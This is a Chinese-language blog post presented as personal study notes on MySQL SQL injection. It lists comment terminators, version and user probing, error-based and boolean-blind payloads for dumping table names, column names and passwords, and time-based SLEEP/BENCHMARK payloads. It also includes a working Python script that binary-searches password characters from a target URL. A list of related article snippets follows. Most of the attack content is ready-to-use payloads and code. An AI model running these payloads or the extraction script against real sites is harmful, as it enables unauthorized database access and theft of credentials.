2. 程式人生 > >sql注入學習小結

sql注入學習小結

阿新 發佈:2019-01-10

sql注入小結

尾部處理小結

#
/*
;%00

基礎資訊獲取小結

  • sql版本資訊
    AND MID(VERSION(),1,1) = ‘5’
    還有一種看到的網上的大牛獲取資訊的方法
    1 /!50094eaea/; False - version is equal or greater than 5.00.94
    1 /!50096eaea/; True - version is lesser than 5.00.96
    1 /!50095eaea/; False - version is equal to 5.00.95
  • 主機名
    SELECT @@hostname
  • 當前資料庫名,使用者名稱
    select database(),user()

tips:可以用到的一些小技巧:
多個數據group_concat()或者concat()直接爆出來

資料庫資訊獲取(盲注)

  • 資料庫數量
    and (select count(schema_name) from information_schema limit 0,1)>=0

  • 指定資料庫中表猜解

    1. AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > ‘A’
    2. and ascii(substr((select table_name from information_schema.tables where table_schema=%s limit %d,1),%d,1))>%d 資料庫名需要hex形式
    3. 基於錯誤回顯的直接蕩了
      AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2)))
      (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),[email protected]) HAVING @||MIN(@:=0);

  • 表中列數猜解

    1. and ascii(substr((select table_name from information_schema.tables where table_schema=0x123456 and table_name=0x123456limit %d,1),%d,1))>0
    2. AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2)))
      (@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),[email protected]) HAVING @||MIN(@:=0);

  • 具體資料猜解
    and ascii(substr((select password from XXX.super_user_info limit %d,1),%d,1))>%d

# -*-coding:utf-8-*-
import urllib2
import urllib
import string
import time
testpayload="http://XXX.XXX.XX/XXX.php?id=14"
payload2=" and ascii(substr((select password from XXXX.XXXXXXX limit %d,1),%d,1))>%d"
payload=" and ascii(substr((select column_name from information_schema.columns where table_schema=0xXXXXXXXX and table_name=0xXXXXXXXXXX limit %d,1),%d,1))>%d"
def GetTableName(payload,i,j,k):
    finalurl = testpayload + urllib.quote(payload % (i,j,k)) + "&up_id=1"
    res = urllib2.urlopen(finalurl).read()
    temp = res.find("<p class=\"MsoNormal\" style=\"margin-left:0pt;text-indent:24pt;text-align:left;\">")
    if temp > 0:
        return True
    else:
        return False
def main():
    for i in xrange(0, 100):
        num = str(i)
        charnum = 1
        tmp = ''
        if GetTableName(payload2, 0, charnum, 0) == False:
            break
        while (1):
            left = 0
            right = 127
            mid = (left + right) / 2
            if GetTableName(payload2,i,charnum,0) == False:
                break
            while left < right - 1:
                # 如果該字串的第i個字元的ascii碼大於等於mid
                if GetTableName(payload2,i,charnum,mid) == True:
                    # 則更新左邊界
                    left = mid
                    mid = (left + right) / 2
                else:
                    # 否則該字串的第i個字元的ascii碼小於mid
                    # 則更新右邊界
                    right = mid
                    # 更新中值
                mid = (left + right) / 2
            print chr(left + 1)
            tmp += chr(left + 1)
            charnum += 1
        print "column name:" + tmp
main()

  • 一些小技巧
    SELECT CONCAT(‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
    SELECT CONCAT_WS(”, ‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
    SELECT GROUP_CONCAT(‘a’, ‘d’, ‘m’, ‘i’, ‘n’);

  • 有關基於時間盲注的函式
    SLEEP() MySQL 5
    BENCHMARK() MySQL 4/5
    example:

    ’ - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1(‘true’)), false)) - ‘

相關推薦

sql注入學習小結

sql注入小結 尾部處理小結 # /* ;%00 基礎資訊獲取小結 sql版本資訊 AND MID(VERSION(),1,1) = ‘5’ 還有一種看到的網上的大牛獲取資訊的方法 1 /!50094ea

Java SQL注入學習筆記

1 簡介 文章主要內容包括: Java 持久層技術/框架簡單介紹 不同場景/框架下易導致 SQL 注入的寫法 如何避免和修復 SQL 注入 2 JDBC 介紹 JDBC: 全稱 Java Database Connectivity 是 Java 訪問資料庫的 API,

Jarvis OJ–Login 透過MD5()下的SQL注入學習MD5加密

哎,都是8年前的題目了,感覺自己進展好慢。看解釋原理也不復雜,就是MD5()函式中引數為true時,輸出形式為原始二進位制格式,如果,找到一個字串MD5後得到的原始二進位制格式在SQL中拼接成 類似 ‘or ‘1xxx的形式就可以繞過了.文章中作者寫指令碼找到了一個字串ffi

Sql注入型別小結

Sql注入型別1.前言Sql注入形成的原因:使用者輸入的非法資料被直譯器執行2.注入型別2.1注入點的不同(1)數字型別的注入當輸入引數為數字型別時,例如頁碼,ID等,存在注入時則為數字型別的注入。測試方法如下:說明存在注入可能。這類注入方式常見於PHP和ASP等弱型別語言中

預防SQL注入 學習筆記

SQL注入是個老話題,前一段中招了,所以總結了些注意事項,可以快速簡單的幫助防止大部分的注入攻擊 個人覺得引數化和資料庫許可權是相對簡單和有效的方案。 1、Domain Driver Design: 一種設計思想,強調識別可信任和不可信任呼叫,確認安全防範邊界,保證這個

DVWA平臺的sql注入學習

要用UNION語句,必須先知道後臺的查詢語句的查詢結果是多少列的,所以利用order by語句測試,此處就是將輸入“‘ or '1' = '1' order by 1 -- ”的order by 1部分改成2,3……當按照第二列排序時,不報錯,當按第三列排序時,報錯,因此可得到查詢結果是2列的。所以我們用UN

java防sql注入方法小結

本文對java操作資料庫的一項重點內容——防sql注入進行說明。對現有方法進行了簡單優劣討論與總結,供大家參考討論。 重點:不要將使用者輸入內容,在未經檢查的情況下,直接拼接為sql語句進行資料庫訪問操作。 防sql注入方法如下: 過濾輸入 對輸入內容

(學習)SQL注入--寬位元組注入

SQL注入–寬位元組注入 實踐: http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1 頁面顯示: 顯然執行的查詢語句是: select id,title from news where id = '1' 其

【28】WEB安全學習----SQL注入總結

檢測注入 不管什麼資料庫注入,檢測是否有注入點是第一步,而檢測的方法大同小異。 1、閉合SQL拼接語句 要想進行下一步注入,首先需要閉合SQL語句,如何知道閉合符號是什麼呢?可通過在引數後面加入單引號或雙引號使其整條SQL拼接語句失敗,從而可從資料庫報錯資訊得知,若沒有

Java學習之路- SQL注入

使用者名稱: __________ 密碼:———————   假如沒有使用預處理的Statement 物件 拼接字串查資料庫的話,易收到sql注入攻擊;   例如說 : mysql 中   #代表的是單行註釋  SELECT * FROM t_u

sql注入小結

  才學了sql注入沒多久,就忘得乾乾淨淨了,也是佩服我自己。想學太多東西了,欲速則不達啊。還是老老實實記錄些東西吧,學的時候得認真不然再回頭看的時候真的是啥都不會。 常用語句 先來總結下做sqli-labs常用得語句吧。(以三個欄位為例) 查基本資訊:id=xx' u

kali學習筆記——實戰sqlmap入侵某網站(存在sql注入漏洞)

前言 直接上實戰,原理在下面會簡單介紹,有需要詳細教程的到這裡下載: https://download.csdn.net/download/u013819875/10503430 首先宣告我也只是一個網路愛好者,菜鳥水平(不過php,sql都是學過,有一些基礎的),寫這篇文章權當學

通過sqli-labs學習sql注入——基礎挑戰之less1

前言:            之前只是簡單瞭解過SQL注入,只僅僅侷限於會使用sqlmap等注入工具,但是手工注入方面就懂的很少了,所以準備通過sqli-lab這個注入平臺的學習好好研究下常見的手工注入方面的

php學習筆記(二十)mysqli的stmt的預處理類的使用(防止sql注入問題)

<?php /** * 處理資料庫的擴充套件庫 * * mysqli的預處理語句 * mysqli_stmt預處理類(推薦使用的類) * 優點:(mysqli和mysqli_result類的相比

通過sqli-labs學習sql注入——基礎挑戰之less1-10

雖然sql注入接觸過不少,其實也不太多,但是不繫統,那就通過sqli-libs系統學習總結一下吧 注:第一個就說得詳細一點,後面的有新知識才會說,所以第一個一定要看!!!如果第一個還有不明白的地方,歡迎評論提問,注意一定自己要先實踐。 我的學習的方法是什麼呢? 先自己嘗

通過sqli-labs學習sql注入——進階挑戰之less23-28a

這次我又來了,Advanced Injections(進階挑戰),就是一些過濾繞過的東西了,基礎挑戰看這個兩篇 通過sqli-labs學習sql注入——基礎挑戰之less1-10 通過sqli-labs學習sql注入——基礎挑戰之less11-22

JDBC學習之路(三)防止SQL注入,PreparedStatement探索

   現在登入註冊或者其他很多地方遇到使用者輸入的內容可以直接拿到資料庫內部去進行執行SQL語句,這個是一項很危險的運動,因為你不知道使用者會輸入什麼,如果使用者對SQL語句很熟悉,他就可以在輸入的時候加上''兩個冒號作為特殊字元,這樣的話會讓計算機認為他輸入的是SQL語句

防止SQL注入攻擊的一些方法小結

開頭語:SQL注入攻擊的危害性很大。在講解其防止辦法之前,資料庫管理員有必要先了解一下其攻擊的原理。這有利於管理員採取有針對性的防治措施 -----解決方案-------------------------------------------------------- 過濾

【安全牛學習筆記】手動漏洞挖掘-SQL注入

      目前行業內受認可的資訊保安認證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重資訊保安管理的,技術知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的資訊保安工作經驗都要5年以上,CISP也要求大專學歷4年以上工作經驗,這些要求無疑把有能力且上進的年輕人的持證之路堵

零基礎學習手工SQL注入

原文地址:https://mozhe.cn/news/detail/324SQL注入介紹SQL注入,其實就是使用者瀏覽器提交的變數內容,應用程式(程式碼可能是asp、aspx、php、jsp等)對瀏覽器提交過來的資料未過濾,直接去資料庫查詢,導致把資料庫裡面其他內容(如管理賬